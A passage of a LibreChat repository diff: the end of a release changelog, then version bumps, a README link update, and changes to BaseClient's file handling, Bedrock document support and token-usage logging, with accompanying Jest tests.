- 🔗 feat: Agent Chain (Mixture-of-Agents) by **@danny-avila** in [#6374](https://github.com/danny-avila/LibreChat/pull/6374)
|
|
||||||
- ⌛ feat: `initTimeout` for Slow Starting MCP Servers by **@perweij** in [#6383](https://github.com/danny-avila/LibreChat/pull/6383)
|
|
||||||
- 🚀 feat: `S3` Integration for File handling and Image uploads by **@rubentalstra** in [#6142](https://github.com/danny-avila/LibreChat/pull/6142)
|
|
||||||
- 🔒feat: Enable OpenID Auto-Redirect by **@leondape** in [#6066](https://github.com/danny-avila/LibreChat/pull/6066)
|
|
||||||
- 🚀 feat: Integrate `Azure Blob Storage` for file handling and image uploads by **@rubentalstra** in [#6153](https://github.com/danny-avila/LibreChat/pull/6153)
|
|
||||||
- 🚀 feat: Add support for custom `AWS` endpoint in `S3` by **@rubentalstra** in [#6431](https://github.com/danny-avila/LibreChat/pull/6431)
|
|
||||||
- 🚀 feat: Add support for LDAP STARTTLS in LDAP authentication by **@rubentalstra** in [#6438](https://github.com/danny-avila/LibreChat/pull/6438)
|
|
||||||
- 🚀 feat: Refactor schema exports and update package version to 0.0.4 by **@rubentalstra** in [#6455](https://github.com/danny-avila/LibreChat/pull/6455)
|
|
||||||
- 🔼 feat: Add Auto Submit For URL Query Params by **@mjaverto** in [#6440](https://github.com/danny-avila/LibreChat/pull/6440)
|
|
||||||
- 🛠 feat: Enhance Redis Integration, Rate Limiters & Log Headers by **@danny-avila** in [#6462](https://github.com/danny-avila/LibreChat/pull/6462)
|
|
||||||
- 💵 feat: Add Automatic Balance Refill by **@rubentalstra** in [#6452](https://github.com/danny-avila/LibreChat/pull/6452)
|
|
||||||
- 🗣️ feat: add support for gpt-4o-transcribe models by **@berry-13** in [#6483](https://github.com/danny-avila/LibreChat/pull/6483)
|
|
||||||
- 🎨 feat: UI Refresh for Enhanced UX by **@berry-13** in [#6346](https://github.com/danny-avila/LibreChat/pull/6346)
|
|
||||||
- 🌍 feat: Add support for Hungarian language localization by **@rubentalstra** in [#6508](https://github.com/danny-avila/LibreChat/pull/6508)
|
|
||||||
- 🚀 feat: Add Gemini 2.5 Token/Context Values, Increase Max Possible Output to 64k by **@danny-avila** in [#6563](https://github.com/danny-avila/LibreChat/pull/6563)
|
|
||||||
- 🚀 feat: Enhance MCP Connections For Multi-User Support by **@danny-avila** in [#6610](https://github.com/danny-avila/LibreChat/pull/6610)
|
|
||||||
- 🚀 feat: Enhance S3 URL Expiry with Refresh; fix: S3 File Deletion by **@danny-avila** in [#6647](https://github.com/danny-avila/LibreChat/pull/6647)
|
|
||||||
- 🚀 feat: enhance UI components and refactor settings by **@berry-13** in [#6625](https://github.com/danny-avila/LibreChat/pull/6625)
|
|
||||||
- 💬 feat: move TemporaryChat to the Header by **@berry-13** in [#6646](https://github.com/danny-avila/LibreChat/pull/6646)
|
|
||||||
- 🚀 feat: Use Model Specs + Specific Endpoints, Limit Providers for Agents by **@danny-avila** in [#6650](https://github.com/danny-avila/LibreChat/pull/6650)
|
|
||||||
- 🪙 feat: Sync Balance Config on Login by **@danny-avila** in [#6671](https://github.com/danny-avila/LibreChat/pull/6671)
|
|
||||||
- 🔦 feat: MCP Support for Non-Agent Endpoints by **@danny-avila** in [#6775](https://github.com/danny-avila/LibreChat/pull/6775)
|
|
||||||
- 🗃️ feat: Code Interpreter File Persistence between Sessions by **@danny-avila** in [#6790](https://github.com/danny-avila/LibreChat/pull/6790)
|
|
||||||
- 🖥️ feat: Code Interpreter API for Non-Agent Endpoints by **@danny-avila** in [#6803](https://github.com/danny-avila/LibreChat/pull/6803)
|
|
||||||
- ⚡ feat: Self-hosted Artifacts Static Bundler URL by **@danny-avila** in [#6827](https://github.com/danny-avila/LibreChat/pull/6827)
|
|
||||||
- 🐳 feat: Add Jemalloc and UV to Docker Builds by **@danny-avila** in [#6836](https://github.com/danny-avila/LibreChat/pull/6836)
|
|
||||||
- 🤖 feat: GPT-4.1 by **@danny-avila** in [#6880](https://github.com/danny-avila/LibreChat/pull/6880)
|
|
||||||
- 👋 feat: remove Edge TTS by **@berry-13** in [#6885](https://github.com/danny-avila/LibreChat/pull/6885)
|
|
||||||
- feat: nav optimization by **@berry-13** in [#5785](https://github.com/danny-avila/LibreChat/pull/5785)
|
|
||||||
- 🗺️ feat: Add Parameter Location Mapping for OpenAPI actions by **@peeeteeer** in [#6858](https://github.com/danny-avila/LibreChat/pull/6858)
|
|
||||||
- 🤖 feat: Support `o4-mini` and `o3` Models by **@danny-avila** in [#6928](https://github.com/danny-avila/LibreChat/pull/6928)
|
|
||||||
- 🎨 feat: OpenAI Image Tools (GPT-Image-1) by **@danny-avila** in [#7079](https://github.com/danny-avila/LibreChat/pull/7079)
|
|
||||||
- 🗓️ feat: Add Special Variables for Prompts & Agents, Prompt UI Improvements by **@danny-avila** in [#7123](https://github.com/danny-avila/LibreChat/pull/7123)
|
|
||||||
|
|
||||||
### 🌍 Internationalization
|
|
||||||
|
|
||||||
- 🌍 i18n: Add Thai Language Support and Update Translations by **@rubentalstra** in [#6219](https://github.com/danny-avila/LibreChat/pull/6219)
|
|
||||||
- 🌍 i18n: Update translation.json with latest translations by **@github-actions[bot]** in [#6220](https://github.com/danny-avila/LibreChat/pull/6220)
|
|
||||||
- 🌍 i18n: Update translation.json with latest translations by **@github-actions[bot]** in [#6240](https://github.com/danny-avila/LibreChat/pull/6240)
|
|
||||||
- 🌍 i18n: Update translation.json with latest translations by **@github-actions[bot]** in [#6241](https://github.com/danny-avila/LibreChat/pull/6241)
|
|
||||||
- 🌍 i18n: Update translation.json with latest translations by **@github-actions[bot]** in [#6277](https://github.com/danny-avila/LibreChat/pull/6277)
|
|
||||||
- 🌍 i18n: Update translation.json with latest translations by **@github-actions[bot]** in [#6414](https://github.com/danny-avila/LibreChat/pull/6414)
|
|
||||||
- 🌍 i18n: Update translation.json with latest translations by **@github-actions[bot]** in [#6505](https://github.com/danny-avila/LibreChat/pull/6505)
|
|
||||||
- 🌍 i18n: Update translation.json with latest translations by **@github-actions[bot]** in [#6530](https://github.com/danny-avila/LibreChat/pull/6530)
|
|
||||||
- 🌍 i18n: Add Persian Localization Support by **@rubentalstra** in [#6669](https://github.com/danny-avila/LibreChat/pull/6669)
|
|
||||||
- 🌍 i18n: Update translation.json with latest translations by **@github-actions[bot]** in [#6667](https://github.com/danny-avila/LibreChat/pull/6667)
|
|
||||||
- 🌍 i18n: Update translation.json with latest translations by **@github-actions[bot]** in [#7126](https://github.com/danny-avila/LibreChat/pull/7126)
|
|
||||||
- 🌍 i18n: Update translation.json with latest translations by **@github-actions[bot]** in [#7148](https://github.com/danny-avila/LibreChat/pull/7148)
|
|
||||||
|
|
||||||
### 👐 Accessibility
|
|
||||||
|
|
||||||
- 🎨 a11y: Update Model Spec Description Text by **@berry-13** in [#6294](https://github.com/danny-avila/LibreChat/pull/6294)
|
|
||||||
- 🗑️ a11y: Add Accessible Name to Button for File Attachment Removal by **@kangabell** in [#6709](https://github.com/danny-avila/LibreChat/pull/6709)
|
|
||||||
- ⌨️ a11y: enhance accessibility & visual consistency by **@berry-13** in [#6866](https://github.com/danny-avila/LibreChat/pull/6866)
|
|
||||||
- 🙌 a11y: Searchbar/Conversations List Focus by **@danny-avila** in [#7096](https://github.com/danny-avila/LibreChat/pull/7096)
|
|
||||||
- 👐 a11y: Improve Fork and SplitText Accessibility by **@danny-avila** in [#7147](https://github.com/danny-avila/LibreChat/pull/7147)
|
|
||||||
|
|
||||||
### 🔧 Fixes
|
|
||||||
|
|
||||||
- 🐛 fix: Avatar Type Definitions in Agent/Assistant Schemas by **@danny-avila** in [#6235](https://github.com/danny-avila/LibreChat/pull/6235)
|
|
||||||
- 🔧 fix: MeiliSearch Field Error and Patch Incorrect Import by #6210 by **@rubentalstra** in [#6245](https://github.com/danny-avila/LibreChat/pull/6245)
|
|
||||||
- 🔏 fix: Enhance Two-Factor Authentication by **@rubentalstra** in [#6247](https://github.com/danny-avila/LibreChat/pull/6247)
|
|
||||||
- 🐛 fix: Await saveMessage in abortMiddleware to ensure proper execution by **@sh4shii** in [#6248](https://github.com/danny-avila/LibreChat/pull/6248)
|
|
||||||
- 🔧 fix: Axios Proxy Usage And Bump `mongoose` by **@danny-avila** in [#6298](https://github.com/danny-avila/LibreChat/pull/6298)
|
|
||||||
- 🔧 fix: comment out MCP servers to resolve service run issues by **@KunalScriptz** in [#6316](https://github.com/danny-avila/LibreChat/pull/6316)
|
|
||||||
- 🔧 fix: Update Token Calculations and Mapping, MCP `env` Initialization by **@danny-avila** in [#6406](https://github.com/danny-avila/LibreChat/pull/6406)
|
|
||||||
- 🐞 fix: Agent "Resend" Message Attachments + Source Icon Styling by **@danny-avila** in [#6408](https://github.com/danny-avila/LibreChat/pull/6408)
|
|
||||||
- 🐛 fix: Prevent Crash on Duplicate Message ID by **@Odrec** in [#6392](https://github.com/danny-avila/LibreChat/pull/6392)
|
|
||||||
- 🔐 fix: Invalid Key Length in 2FA Encryption by **@rubentalstra** in [#6432](https://github.com/danny-avila/LibreChat/pull/6432)
|
|
||||||
- 🏗️ fix: Fix Agents Token Spend Race Conditions, Expand Test Coverage by **@danny-avila** in [#6480](https://github.com/danny-avila/LibreChat/pull/6480)
|
|
||||||
- 🔃 fix: Draft Clearing, Claude Titles, Remove Default Vision Max Tokens by **@danny-avila** in [#6501](https://github.com/danny-avila/LibreChat/pull/6501)
|
|
||||||
- 🔧 fix: Update username reference to use user.name in greeting display by **@rubentalstra** in [#6534](https://github.com/danny-avila/LibreChat/pull/6534)
|
|
||||||
- 🔧 fix: S3 Download Stream with Key Extraction and Blob Storage Encoding for Vision by **@danny-avila** in [#6557](https://github.com/danny-avila/LibreChat/pull/6557)
|
|
||||||
- 🔧 fix: Mistral type strictness for `usage` & update token values/windows by **@danny-avila** in [#6562](https://github.com/danny-avila/LibreChat/pull/6562)
|
|
||||||
- 🔧 fix: Consolidate Text Parsing and TTS Edge Initialization by **@danny-avila** in [#6582](https://github.com/danny-avila/LibreChat/pull/6582)
|
|
||||||
- 🔧 fix: Ensure continuation in image processing on base64 encoding from Blob Storage by **@danny-avila** in [#6619](https://github.com/danny-avila/LibreChat/pull/6619)
|
|
||||||
- ✉️ fix: Fallback For User Name In Email Templates by **@danny-avila** in [#6620](https://github.com/danny-avila/LibreChat/pull/6620)
|
|
||||||
- 🔧 fix: Azure Blob Integration and File Source References by **@rubentalstra** in [#6575](https://github.com/danny-avila/LibreChat/pull/6575)
|
|
||||||
- 🐛 fix: Safeguard against undefined addedEndpoints by **@wipash** in [#6654](https://github.com/danny-avila/LibreChat/pull/6654)
|
|
||||||
- 🤖 fix: Gemini 2.5 Vision Support by **@danny-avila** in [#6663](https://github.com/danny-avila/LibreChat/pull/6663)
|
|
||||||
- 🔄 fix: Avatar & Error Handling Enhancements by **@danny-avila** in [#6687](https://github.com/danny-avila/LibreChat/pull/6687)
|
|
||||||
- 🔧 fix: Chat Middleware, Zod Conversion, Auto-Save and S3 URL Refresh by **@danny-avila** in [#6720](https://github.com/danny-avila/LibreChat/pull/6720)
|
|
||||||
- 🔧 fix: Agent Capability Checks & DocumentDB Compatibility for Agent Resource Removal by **@danny-avila** in [#6726](https://github.com/danny-avila/LibreChat/pull/6726)
|
|
||||||
- 🔄 fix: Improve audio MIME type detection and handling by **@berry-13** in [#6707](https://github.com/danny-avila/LibreChat/pull/6707)
|
|
||||||
- 🪺 fix: Update Role Handling due to New Schema Shape by **@danny-avila** in [#6774](https://github.com/danny-avila/LibreChat/pull/6774)
|
|
||||||
- 🗨️ fix: Show ModelSpec Greeting by **@berry-13** in [#6770](https://github.com/danny-avila/LibreChat/pull/6770)
|
|
||||||
- 🔧 fix: Keyv and Proxy Issues, and More Memory Optimizations by **@danny-avila** in [#6867](https://github.com/danny-avila/LibreChat/pull/6867)
|
|
||||||
- ✨ fix: Implement dynamic text sizing for greeting and name display by **@berry-13** in [#6833](https://github.com/danny-avila/LibreChat/pull/6833)
|
|
||||||
- 📝 fix: Mistral OCR Image Support and Azure Agent Titles by **@danny-avila** in [#6901](https://github.com/danny-avila/LibreChat/pull/6901)
|
|
||||||
- 📢 fix: Invalid `engineTTS` and Conversation State on Navigation by **@berry-13** in [#6904](https://github.com/danny-avila/LibreChat/pull/6904)
|
|
||||||
- 🛠️ fix: Improve Accessibility and Display of Conversation Menu by **@danny-avila** in [#6913](https://github.com/danny-avila/LibreChat/pull/6913)
|
|
||||||
- 🔧 fix: Agent Resource Form, Convo Menu Style, Ensure Draft Clears on Submission by **@danny-avila** in [#6925](https://github.com/danny-avila/LibreChat/pull/6925)
|
|
||||||
- 🔀 fix: MCP Improvements, Auto-Save Drafts, Artifact Markup by **@danny-avila** in [#7040](https://github.com/danny-avila/LibreChat/pull/7040)
|
|
||||||
- 🐋 fix: Improve Deepseek Compatbility by **@danny-avila** in [#7132](https://github.com/danny-avila/LibreChat/pull/7132)
|
|
||||||
- 🐙 fix: Add Redis Ping Interval to Prevent Connection Drops by **@peeeteeer** in [#7127](https://github.com/danny-avila/LibreChat/pull/7127)
|
|
||||||
|
|
||||||
### ⚙️ Other Changes
|
|
||||||
|
|
||||||
- 📦 refactor: Move DB Models to `@librechat/data-schemas` by **@rubentalstra** in [#6210](https://github.com/danny-avila/LibreChat/pull/6210)
|
|
||||||
- 📦 chore: Patch `axios` to address CVE-2025-27152 by **@danny-avila** in [#6222](https://github.com/danny-avila/LibreChat/pull/6222)
|
|
||||||
- ⚠️ refactor: Use Error Content Part Instead Of Throwing Error for Agents by **@danny-avila** in [#6262](https://github.com/danny-avila/LibreChat/pull/6262)
|
|
||||||
- 🏃♂️ refactor: Improve Agent Run Context & Misc. Changes by **@danny-avila** in [#6448](https://github.com/danny-avila/LibreChat/pull/6448)
|
|
||||||
- 📝 docs: librechat.example.yaml by **@ineiti** in [#6442](https://github.com/danny-avila/LibreChat/pull/6442)
|
|
||||||
- 🏃♂️ refactor: More Agent Context Improvements during Run by **@danny-avila** in [#6477](https://github.com/danny-avila/LibreChat/pull/6477)
|
|
||||||
- 🔃 refactor: Allow streaming for `o1` models by **@danny-avila** in [#6509](https://github.com/danny-avila/LibreChat/pull/6509)
|
|
||||||
- 🔧 chore: `Vite` Plugin Upgrades & Config Optimizations by **@rubentalstra** in [#6547](https://github.com/danny-avila/LibreChat/pull/6547)
|
|
||||||
- 🔧 refactor: Consolidate Logging, Model Selection & Actions Optimizations, Minor Fixes by **@danny-avila** in [#6553](https://github.com/danny-avila/LibreChat/pull/6553)
|
|
||||||
- 🎨 style: Address Minor UI Refresh Issues by **@berry-13** in [#6552](https://github.com/danny-avila/LibreChat/pull/6552)
|
|
||||||
- 🔧 refactor: Enhance Model & Endpoint Configurations with Global Indicators 🌍 by **@berry-13** in [#6578](https://github.com/danny-avila/LibreChat/pull/6578)
|
|
||||||
- 💬 style: Chat UI, Greeting, and Message adjustments by **@berry-13** in [#6612](https://github.com/danny-avila/LibreChat/pull/6612)
|
|
||||||
- ⚡ refactor: DocumentDB Compatibility for Balance Updates by **@danny-avila** in [#6673](https://github.com/danny-avila/LibreChat/pull/6673)
|
|
||||||
- 🧹 chore: Update ESLint rules for React hooks by **@rubentalstra** in [#6685](https://github.com/danny-avila/LibreChat/pull/6685)
|
|
||||||
- 🪙 chore: Update Gemini Pricing by **@RedwindA** in [#6731](https://github.com/danny-avila/LibreChat/pull/6731)
|
|
||||||
- 🪺 refactor: Nest Permission fields for Roles by **@rubentalstra** in [#6487](https://github.com/danny-avila/LibreChat/pull/6487)
|
|
||||||
- 📦 chore: Update `caniuse-lite` dependency to version 1.0.30001706 by **@rubentalstra** in [#6482](https://github.com/danny-avila/LibreChat/pull/6482)
|
|
||||||
- ⚙️ refactor: OAuth Flow Signal, Type Safety, Tool Progress & Updated Packages by **@danny-avila** in [#6752](https://github.com/danny-avila/LibreChat/pull/6752)
|
|
||||||
- 📦 chore: bump vite from 6.2.3 to 6.2.5 by **@dependabot[bot]** in [#6745](https://github.com/danny-avila/LibreChat/pull/6745)
|
|
||||||
- 💾 chore: Enhance Local Storage Handling and Update MCP SDK by **@danny-avila** in [#6809](https://github.com/danny-avila/LibreChat/pull/6809)
|
|
||||||
- 🤖 refactor: Improve Agents Memory Usage, Bump Keyv, Grok 3 by **@danny-avila** in [#6850](https://github.com/danny-avila/LibreChat/pull/6850)
|
|
||||||
- 💾 refactor: Enhance Memory In Image Encodings & Client Disposal by **@danny-avila** in [#6852](https://github.com/danny-avila/LibreChat/pull/6852)
|
|
||||||
- 🔁 refactor: Token Event Handler and Standardize `maxTokens` Key by **@danny-avila** in [#6886](https://github.com/danny-avila/LibreChat/pull/6886)
|
|
||||||
- 🔍 refactor: Search & Message Retrieval by **@berry-13** in [#6903](https://github.com/danny-avila/LibreChat/pull/6903)
|
|
||||||
- 🎨 style: standardize dropdown styling & fix z-Index layering by **@berry-13** in [#6939](https://github.com/danny-avila/LibreChat/pull/6939)
|
|
||||||
- 📙 docs: CONTRIBUTING.md by **@dblock** in [#6831](https://github.com/danny-avila/LibreChat/pull/6831)
|
|
||||||
- 🧭 refactor: Modernize Nav/Header by **@danny-avila** in [#7094](https://github.com/danny-avila/LibreChat/pull/7094)
|
|
||||||
- 🪶 refactor: Chat Input Focus for Conversation Navigations & ChatForm Optimizations by **@danny-avila** in [#7100](https://github.com/danny-avila/LibreChat/pull/7100)
|
|
||||||
- 🔃 refactor: Streamline Navigation, Message Loading UX by **@danny-avila** in [#7118](https://github.com/danny-avila/LibreChat/pull/7118)
|
|
||||||
- 📜 docs: Unreleased changelog by **@github-actions[bot]** in [#6265](https://github.com/danny-avila/LibreChat/pull/6265)
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
[See full release details][release-v0.7.8-rc1]
|
|
||||||
|
|
||||||
[release-v0.7.8-rc1]: https://github.com/danny-avila/LibreChat/releases/tag/v0.7.8-rc1
|
|
||||||
|
|
||||||
---
|
|
||||||
1
CLAUDE.md
Symbolic link
1
CLAUDE.md
Symbolic link
|
|
@ -0,0 +1 @@
|
||||||
|
AGENTS.md
|
||||||
|
|
@ -1,4 +1,4 @@
|
||||||
# v0.8.3-rc1
|
# v0.8.3
|
||||||
|
|
||||||
# Base node image
|
# Base node image
|
||||||
FROM node:20-alpine AS node
|
FROM node:20-alpine AS node
|
||||||
|
|
|
||||||
|
|
@ -1,5 +1,5 @@
|
||||||
# Dockerfile.multi
|
# Dockerfile.multi
|
||||||
# v0.8.3-rc1
|
# v0.8.3
|
||||||
|
|
||||||
# Set configurable max-old-space-size with default
|
# Set configurable max-old-space-size with default
|
||||||
ARG NODE_MAX_OLD_SPACE_SIZE=6144
|
ARG NODE_MAX_OLD_SPACE_SIZE=6144
|
||||||
|
|
|
||||||
|
|
@ -27,8 +27,8 @@
|
||||||
</p>
|
</p>
|
||||||
|
|
||||||
<p align="center">
|
<p align="center">
|
||||||
<a href="https://railway.app/template/b5k2mn?referralCode=HI9hWz">
|
<a href="https://railway.com/deploy/b5k2mn?referralCode=HI9hWz">
|
||||||
<img src="https://railway.app/button.svg" alt="Deploy on Railway" height="30">
|
<img src="https://railway.com/button.svg" alt="Deploy on Railway" height="30">
|
||||||
</a>
|
</a>
|
||||||
<a href="https://zeabur.com/templates/0X2ZY8">
|
<a href="https://zeabur.com/templates/0X2ZY8">
|
||||||
<img src="https://zeabur.com/button.svg" alt="Deploy on Zeabur" height="30"/>
|
<img src="https://zeabur.com/button.svg" alt="Deploy on Zeabur" height="30"/>
|
||||||
|
|
|
||||||
|
|
@ -4,6 +4,7 @@ const { logger } = require('@librechat/data-schemas');
|
||||||
const {
|
const {
|
||||||
countTokens,
|
countTokens,
|
||||||
getBalanceConfig,
|
getBalanceConfig,
|
||||||
|
buildMessageFiles,
|
||||||
extractFileContext,
|
extractFileContext,
|
||||||
encodeAndFormatAudios,
|
encodeAndFormatAudios,
|
||||||
encodeAndFormatVideos,
|
encodeAndFormatVideos,
|
||||||
|
|
@ -20,6 +21,7 @@ const {
|
||||||
isAgentsEndpoint,
|
isAgentsEndpoint,
|
||||||
isEphemeralAgentId,
|
isEphemeralAgentId,
|
||||||
supportsBalanceCheck,
|
supportsBalanceCheck,
|
||||||
|
isBedrockDocumentType,
|
||||||
} = require('librechat-data-provider');
|
} = require('librechat-data-provider');
|
||||||
const {
|
const {
|
||||||
updateMessage,
|
updateMessage,
|
||||||
|
|
@ -122,7 +124,9 @@ class BaseClient {
|
||||||
* @returns {number}
|
* @returns {number}
|
||||||
*/
|
*/
|
||||||
getTokenCountForResponse(responseMessage) {
|
getTokenCountForResponse(responseMessage) {
|
||||||
logger.debug('[BaseClient] `recordTokenUsage` not implemented.', responseMessage);
|
logger.debug('[BaseClient] `recordTokenUsage` not implemented.', {
|
||||||
|
messageId: responseMessage?.messageId,
|
||||||
|
});
|
||||||
}
|
}
|
||||||
|
|
||||||
/**
|
/**
|
||||||
|
|
@ -133,12 +137,14 @@ class BaseClient {
|
||||||
* @param {AppConfig['balance']} [balance]
|
* @param {AppConfig['balance']} [balance]
|
||||||
* @param {number} promptTokens
|
* @param {number} promptTokens
|
||||||
* @param {number} completionTokens
|
* @param {number} completionTokens
|
||||||
|
* @param {string} [messageId]
|
||||||
* @returns {Promise<void>}
|
* @returns {Promise<void>}
|
||||||
*/
|
*/
|
||||||
async recordTokenUsage({ model, balance, promptTokens, completionTokens }) {
|
async recordTokenUsage({ model, balance, promptTokens, completionTokens, messageId }) {
|
||||||
logger.debug('[BaseClient] `recordTokenUsage` not implemented.', {
|
logger.debug('[BaseClient] `recordTokenUsage` not implemented.', {
|
||||||
model,
|
model,
|
||||||
balance,
|
balance,
|
||||||
|
messageId,
|
||||||
promptTokens,
|
promptTokens,
|
||||||
completionTokens,
|
completionTokens,
|
||||||
});
|
});
|
||||||
|
|
@ -659,16 +665,27 @@ class BaseClient {
|
||||||
);
|
);
|
||||||
|
|
||||||
if (tokenCountMap) {
|
if (tokenCountMap) {
|
||||||
logger.debug('[BaseClient] tokenCountMap', tokenCountMap);
|
|
||||||
if (tokenCountMap[userMessage.messageId]) {
|
if (tokenCountMap[userMessage.messageId]) {
|
||||||
userMessage.tokenCount = tokenCountMap[userMessage.messageId];
|
userMessage.tokenCount = tokenCountMap[userMessage.messageId];
|
||||||
logger.debug('[BaseClient] userMessage', userMessage);
|
logger.debug('[BaseClient] userMessage', {
|
||||||
|
messageId: userMessage.messageId,
|
||||||
|
tokenCount: userMessage.tokenCount,
|
||||||
|
conversationId: userMessage.conversationId,
|
||||||
|
});
|
||||||
}
|
}
|
||||||
|
|
||||||
this.handleTokenCountMap(tokenCountMap);
|
this.handleTokenCountMap(tokenCountMap);
|
||||||
}
|
}
|
||||||
|
|
||||||
if (!isEdited && !this.skipSaveUserMessage) {
|
if (!isEdited && !this.skipSaveUserMessage) {
|
||||||
|
const reqFiles = this.options.req?.body?.files;
|
||||||
|
if (reqFiles && Array.isArray(this.options.attachments)) {
|
||||||
|
const files = buildMessageFiles(reqFiles, this.options.attachments);
|
||||||
|
if (files.length > 0) {
|
||||||
|
userMessage.files = files;
|
||||||
|
}
|
||||||
|
delete userMessage.image_urls;
|
||||||
|
}
|
||||||
userMessagePromise = this.saveMessageToDatabase(userMessage, saveOptions, user);
|
userMessagePromise = this.saveMessageToDatabase(userMessage, saveOptions, user);
|
||||||
this.savedMessageIds.add(userMessage.messageId);
|
this.savedMessageIds.add(userMessage.messageId);
|
||||||
if (typeof opts?.getReqData === 'function') {
|
if (typeof opts?.getReqData === 'function') {
|
||||||
|
|
@ -780,9 +797,18 @@ class BaseClient {
|
||||||
promptTokens,
|
promptTokens,
|
||||||
completionTokens,
|
completionTokens,
|
||||||
balance: balanceConfig,
|
balance: balanceConfig,
|
||||||
model: responseMessage.model,
|
/** Note: When using agents, responseMessage.model is the agent ID, not the model */
|
||||||
|
model: this.model,
|
||||||
|
messageId: this.responseMessageId,
|
||||||
});
|
});
|
||||||
}
|
}
|
||||||
|
|
||||||
|
logger.debug('[BaseClient] Response token usage', {
|
||||||
|
messageId: responseMessage.messageId,
|
||||||
|
model: responseMessage.model,
|
||||||
|
promptTokens,
|
||||||
|
completionTokens,
|
||||||
|
});
|
||||||
}
|
}
|
||||||
|
|
||||||
if (userMessagePromise) {
|
if (userMessagePromise) {
|
||||||
|
|
@ -1300,6 +1326,9 @@ class BaseClient {
|
||||||
|
|
||||||
const allFiles = [];
|
const allFiles = [];
|
||||||
|
|
||||||
|
const provider = this.options.agent?.provider ?? this.options.endpoint;
|
||||||
|
const isBedrock = provider === EModelEndpoint.bedrock;
|
||||||
|
|
||||||
for (const file of attachments) {
|
for (const file of attachments) {
|
||||||
/** @type {FileSources} */
|
/** @type {FileSources} */
|
||||||
const source = file.source ?? FileSources.local;
|
const source = file.source ?? FileSources.local;
|
||||||
|
|
@ -1317,6 +1346,9 @@ class BaseClient {
|
||||||
} else if (file.type === 'application/pdf') {
|
} else if (file.type === 'application/pdf') {
|
||||||
categorizedAttachments.documents.push(file);
|
categorizedAttachments.documents.push(file);
|
||||||
allFiles.push(file);
|
allFiles.push(file);
|
||||||
|
} else if (isBedrock && isBedrockDocumentType(file.type)) {
|
||||||
|
categorizedAttachments.documents.push(file);
|
||||||
|
allFiles.push(file);
|
||||||
} else if (file.type.startsWith('video/')) {
|
} else if (file.type.startsWith('video/')) {
|
||||||
categorizedAttachments.videos.push(file);
|
categorizedAttachments.videos.push(file);
|
||||||
allFiles.push(file);
|
allFiles.push(file);
|
||||||
|
|
|
||||||
|
|
@ -821,6 +821,56 @@ describe('BaseClient', () => {
|
||||||
});
|
});
|
||||||
});
|
});
|
||||||
|
|
||||||
|
describe('recordTokenUsage model assignment', () => {
|
||||||
|
test('should pass this.model to recordTokenUsage, not the agent ID from responseMessage.model', async () => {
|
||||||
|
const actualModel = 'claude-opus-4-5';
|
||||||
|
const agentId = 'agent_p5Z_IU6EIxBoqn1BoqLBp';
|
||||||
|
|
||||||
|
TestClient.model = actualModel;
|
||||||
|
TestClient.options.endpoint = 'agents';
|
||||||
|
TestClient.options.agent = { id: agentId };
|
||||||
|
|
||||||
|
TestClient.getTokenCountForResponse = jest.fn().mockReturnValue(50);
|
||||||
|
TestClient.recordTokenUsage = jest.fn().mockResolvedValue(undefined);
|
||||||
|
TestClient.buildMessages.mockReturnValue({
|
||||||
|
prompt: [],
|
||||||
|
tokenCountMap: { res: 50 },
|
||||||
|
});
|
||||||
|
|
||||||
|
await TestClient.sendMessage('Hello', {});
|
||||||
|
|
||||||
|
expect(TestClient.recordTokenUsage).toHaveBeenCalledWith(
|
||||||
|
expect.objectContaining({
|
||||||
|
model: actualModel,
|
||||||
|
}),
|
||||||
|
);
|
||||||
|
|
||||||
|
const callArgs = TestClient.recordTokenUsage.mock.calls[0][0];
|
||||||
|
expect(callArgs.model).not.toBe(agentId);
|
||||||
|
});
|
||||||
|
|
||||||
|
test('should pass this.model even when this.model differs from modelOptions.model', async () => {
|
||||||
|
const instanceModel = 'gpt-4o';
|
||||||
|
TestClient.model = instanceModel;
|
||||||
|
TestClient.modelOptions = { model: 'gpt-4o-mini' };
|
||||||
|
|
||||||
|
TestClient.getTokenCountForResponse = jest.fn().mockReturnValue(50);
|
||||||
|
TestClient.recordTokenUsage = jest.fn().mockResolvedValue(undefined);
|
||||||
|
TestClient.buildMessages.mockReturnValue({
|
||||||
|
prompt: [],
|
||||||
|
tokenCountMap: { res: 50 },
|
||||||
|
});
|
||||||
|
|
||||||
|
await TestClient.sendMessage('Hello', {});
|
||||||
|
|
||||||
|
expect(TestClient.recordTokenUsage).toHaveBeenCalledWith(
|
||||||
|
expect.objectContaining({
|
||||||
|
model: instanceModel,
|
||||||
|
}),
|
||||||
|
);
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
describe('getMessagesWithinTokenLimit with instructions', () => {
|
describe('getMessagesWithinTokenLimit with instructions', () => {
|
||||||
test('should always include instructions when present', async () => {
|
test('should always include instructions when present', async () => {
|
||||||
TestClient.maxContextTokens = 50;
|
TestClient.maxContextTokens = 50;
|
||||||
|
|
@ -928,4 +978,123 @@ describe('BaseClient', () => {
|
||||||
expect(result.remainingContextTokens).toBe(2); // 25 - 20 - 3(assistant label)
|
expect(result.remainingContextTokens).toBe(2); // 25 - 20 - 3(assistant label)
|
||||||
});
|
});
|
||||||
});
|
});
|
||||||
|
|
||||||
|
describe('sendMessage file population', () => {
|
||||||
|
const attachment = {
|
||||||
|
file_id: 'file-abc',
|
||||||
|
filename: 'image.png',
|
||||||
|
filepath: '/uploads/image.png',
|
||||||
|
type: 'image/png',
|
||||||
|
bytes: 1024,
|
||||||
|
object: 'file',
|
||||||
|
user: 'user-1',
|
||||||
|
embedded: false,
|
||||||
|
usage: 0,
|
||||||
|
text: 'large ocr blob that should be stripped',
|
||||||
|
_id: 'mongo-id-1',
|
||||||
|
};
|
||||||
|
|
||||||
|
beforeEach(() => {
|
||||||
|
TestClient.options.req = { body: { files: [{ file_id: 'file-abc' }] } };
|
||||||
|
TestClient.options.attachments = [attachment];
|
||||||
|
});
|
||||||
|
|
||||||
|
test('populates userMessage.files before saveMessageToDatabase is called', async () => {
|
||||||
|
TestClient.saveMessageToDatabase = jest.fn().mockImplementation((msg) => {
|
||||||
|
return Promise.resolve({ message: msg });
|
||||||
|
});
|
||||||
|
|
||||||
|
await TestClient.sendMessage('Hello');
|
||||||
|
|
||||||
|
const userSave = TestClient.saveMessageToDatabase.mock.calls.find(
|
||||||
|
([msg]) => msg.isCreatedByUser,
|
||||||
|
);
|
||||||
|
expect(userSave).toBeDefined();
|
||||||
|
expect(userSave[0].files).toBeDefined();
|
||||||
|
expect(userSave[0].files).toHaveLength(1);
|
||||||
|
expect(userSave[0].files[0].file_id).toBe('file-abc');
|
